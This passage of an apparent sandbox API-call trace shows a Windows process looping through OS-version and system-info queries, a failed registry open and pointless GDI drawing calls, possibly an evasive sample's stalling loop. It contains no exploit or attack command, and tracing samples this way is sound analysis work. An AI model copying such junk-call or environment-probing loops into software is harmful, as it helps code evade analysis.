1")) returned 1 [0088.065] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.065] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.065] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.065] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.065] BeginPath (hdc=0x0) returned 0 [0088.065] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.065] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.066] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.066] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.066] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.066] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.066] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.066] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.066] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xdf0401d6 [0088.066] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe10401d3 [0088.066] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040def [0088.066] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040df0 [0088.066] CombineRgn (hrgnDst=0x1040def, hrgnSrc1=0xdf0401d6, hrgnSrc2=0xe10401d3, iMode=1) returned 1 [0088.066] CombineRgn (hrgnDst=0x1040df0, hrgnSrc1=0xdf0401d6, hrgnSrc2=0xe10401d3, iMode=4) returned 2 [0088.066] CreateSolidBrush (color=0xff) returned 0x2100dee [0088.066] CreateSolidBrush (color=0xff0000) returned 0x1100df1 [0088.066] DeleteObject (ho=0x1100df1) returned 1 [0088.066] DeleteObject (ho=0xe10401d3) returned 1 [0088.066] DeleteObject (ho=0xdf0401d6) returned 1 [0088.066] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.066] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.066] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.066] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.066] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.066] BeginPath (hdc=0x0) returned 0 [0088.066] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.066] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.066] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.066] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.066] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.066] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.066] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.066] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.067] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe20401d3 [0088.067] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe00401d6 [0088.067] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040df2 [0088.067] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040df3 [0088.067] CombineRgn (hrgnDst=0x1040df2, hrgnSrc1=0xe20401d3, hrgnSrc2=0xe00401d6, iMode=1) returned 1 [0088.067] CombineRgn (hrgnDst=0x1040df3, hrgnSrc1=0xe20401d3, hrgnSrc2=0xe00401d6, iMode=4) returned 2 [0088.067] CreateSolidBrush (color=0xff) returned 0x2100df1 [0088.067] CreateSolidBrush (color=0xff0000) returned 0x1100df4 [0088.067] DeleteObject (ho=0x1100df4) returned 1 [0088.067] DeleteObject (ho=0xe00401d6) returned 1 [0088.067] DeleteObject (ho=0xe20401d3) returned 1 [0088.067] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.067] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.067] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.067] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.067] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.067] BeginPath (hdc=0x0) returned 0 [0088.067] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.067] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.067] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.067] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.067] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.067] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.067] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.067] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.100] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe10401d6 [0088.100] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe30401d3 [0088.100] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e7c [0088.100] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e7d [0088.100] CombineRgn (hrgnDst=0x1040e7c, hrgnSrc1=0xe10401d6, hrgnSrc2=0xe30401d3, iMode=1) returned 1 [0088.100] CombineRgn (hrgnDst=0x1040e7d, hrgnSrc1=0xe10401d6, hrgnSrc2=0xe30401d3, iMode=4) returned 2 [0088.100] CreateSolidBrush (color=0xff) returned 0x2100df4 [0088.100] CreateSolidBrush (color=0xff0000) returned 0x1100e7e [0088.100] DeleteObject (ho=0x1100e7e) returned 1 [0088.100] DeleteObject (ho=0xe30401d3) returned 1 [0088.100] DeleteObject (ho=0xe10401d6) returned 1 [0088.100] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.100] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.100] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.100] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.100] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.100] BeginPath (hdc=0x0) returned 0 [0088.100] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.100] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.100] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.100] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.100] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.100] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.101] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.101] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.101] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe40401d3 [0088.101] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe20401d6 [0088.101] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e7f [0088.101] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e80 [0088.101] CombineRgn (hrgnDst=0x1040e7f, hrgnSrc1=0xe40401d3, hrgnSrc2=0xe20401d6, iMode=1) returned 1 [0088.101] CombineRgn (hrgnDst=0x1040e80, hrgnSrc1=0xe40401d3, hrgnSrc2=0xe20401d6, iMode=4) returned 2 [0088.101] CreateSolidBrush (color=0xff) returned 0x2100e7e [0088.101] CreateSolidBrush (color=0xff0000) returned 0x1100e81 [0088.101] DeleteObject (ho=0x1100e81) returned 1 [0088.101] DeleteObject (ho=0xe20401d6) returned 1 [0088.101] DeleteObject (ho=0xe40401d3) returned 1 [0088.101] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.101] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.101] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.101] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.101] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.101] BeginPath (hdc=0x0) returned 0 [0088.101] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.101] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.101] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.101] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.101] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.101] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.101] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.101] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.101] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe30401d6 [0088.101] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe50401d3 [0088.101] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e82 [0088.101] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e83 [0088.102] CombineRgn (hrgnDst=0x1040e82, hrgnSrc1=0xe30401d6, hrgnSrc2=0xe50401d3, iMode=1) returned 1 [0088.102] CombineRgn (hrgnDst=0x1040e83, hrgnSrc1=0xe30401d6, hrgnSrc2=0xe50401d3, iMode=4) returned 2 [0088.102] CreateSolidBrush (color=0xff) returned 0x2100e81 [0088.102] CreateSolidBrush (color=0xff0000) returned 0x1100e84 [0088.102] DeleteObject (ho=0x1100e84) returned 1 [0088.102] DeleteObject (ho=0xe50401d3) returned 1 [0088.102] DeleteObject (ho=0xe30401d6) returned 1 [0088.102] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.102] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.102] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.102] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.102] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.102] BeginPath (hdc=0x0) returned 0 [0088.102] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.102] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.102] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.102] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.102] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.102] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.102] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.102] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.102] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe60401d3 [0088.102] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe40401d6 [0088.102] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e85 [0088.102] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e86 [0088.102] CombineRgn (hrgnDst=0x1040e85, hrgnSrc1=0xe60401d3, hrgnSrc2=0xe40401d6, iMode=1) returned 1 [0088.102] CombineRgn (hrgnDst=0x1040e86, hrgnSrc1=0xe60401d3, hrgnSrc2=0xe40401d6, iMode=4) returned 2 [0088.102] CreateSolidBrush (color=0xff) returned 0x2100e84 [0088.102] CreateSolidBrush (color=0xff0000) returned 0x1100e87 [0088.102] DeleteObject (ho=0x1100e87) returned 1 [0088.102] DeleteObject (ho=0xe40401d6) returned 1 [0088.102] DeleteObject (ho=0xe60401d3) returned 1 [0088.102] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.102] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.103] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.103] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.103] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.103] BeginPath (hdc=0x0) returned 0 [0088.103] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.103] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.103] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.103] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.103] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.103] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.103] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.103] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.103] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe50401d6 [0088.103] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe70401d3 [0088.103] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e88 [0088.103] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e89 [0088.103] CombineRgn (hrgnDst=0x1040e88, hrgnSrc1=0xe50401d6, hrgnSrc2=0xe70401d3, iMode=1) returned 1 [0088.103] CombineRgn (hrgnDst=0x1040e89, hrgnSrc1=0xe50401d6, hrgnSrc2=0xe70401d3, iMode=4) returned 2 [0088.103] CreateSolidBrush (color=0xff) returned 0x2100e87 [0088.103] CreateSolidBrush (color=0xff0000) returned 0x1100e8a [0088.103] DeleteObject (ho=0x1100e8a) returned 1 [0088.103] DeleteObject (ho=0xe70401d3) returned 1 [0088.103] DeleteObject (ho=0xe50401d6) returned 1 [0088.103] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.103] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.103] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.103] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.103] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.103] BeginPath (hdc=0x0) returned 0 [0088.103] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.103] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.103] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.103] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.103] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.103] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.103] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.103] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.104] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe80401d3 [0088.104] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe60401d6 [0088.104] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e8b [0088.104] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e8c [0088.104] CombineRgn (hrgnDst=0x1040e8b, hrgnSrc1=0xe80401d3, hrgnSrc2=0xe60401d6, iMode=1) returned 1 [0088.104] CombineRgn (hrgnDst=0x1040e8c, hrgnSrc1=0xe80401d3, hrgnSrc2=0xe60401d6, iMode=4) returned 2 [0088.104] CreateSolidBrush (color=0xff) returned 0x2100e8a [0088.104] CreateSolidBrush (color=0xff0000) returned 0x1100e8d [0088.104] DeleteObject (ho=0x1100e8d) returned 1 [0088.104] DeleteObject (ho=0xe60401d6) returned 1 [0088.104] DeleteObject (ho=0xe80401d3) returned 1 [0088.104] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.104] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.104] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.104] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.104] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.104] BeginPath (hdc=0x0) returned 0 [0088.104] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.104] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.104] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.104] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.104] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.104] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.104] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.104] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.104] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe70401d6 [0088.104] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe90401d3 [0088.104] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e8e [0088.104] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e8f [0088.104] CombineRgn (hrgnDst=0x1040e8e, hrgnSrc1=0xe70401d6, hrgnSrc2=0xe90401d3, iMode=1) returned 1 [0088.104] CombineRgn (hrgnDst=0x1040e8f, hrgnSrc1=0xe70401d6, hrgnSrc2=0xe90401d3, iMode=4) returned 2 [0088.104] CreateSolidBrush (color=0xff) returned 0x2100e8d [0088.104] CreateSolidBrush (color=0xff0000) returned 0x1100e90 [0088.105] DeleteObject (ho=0x1100e90) returned 1 [0088.105] DeleteObject (ho=0xe90401d3) returned 1 [0088.105] DeleteObject (ho=0xe70401d6) returned 1 [0088.105] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.105] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.105] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.105] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.105] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.105] BeginPath (hdc=0x0) returned 0 [0088.105] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.105] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.105] BeginPaint (in: 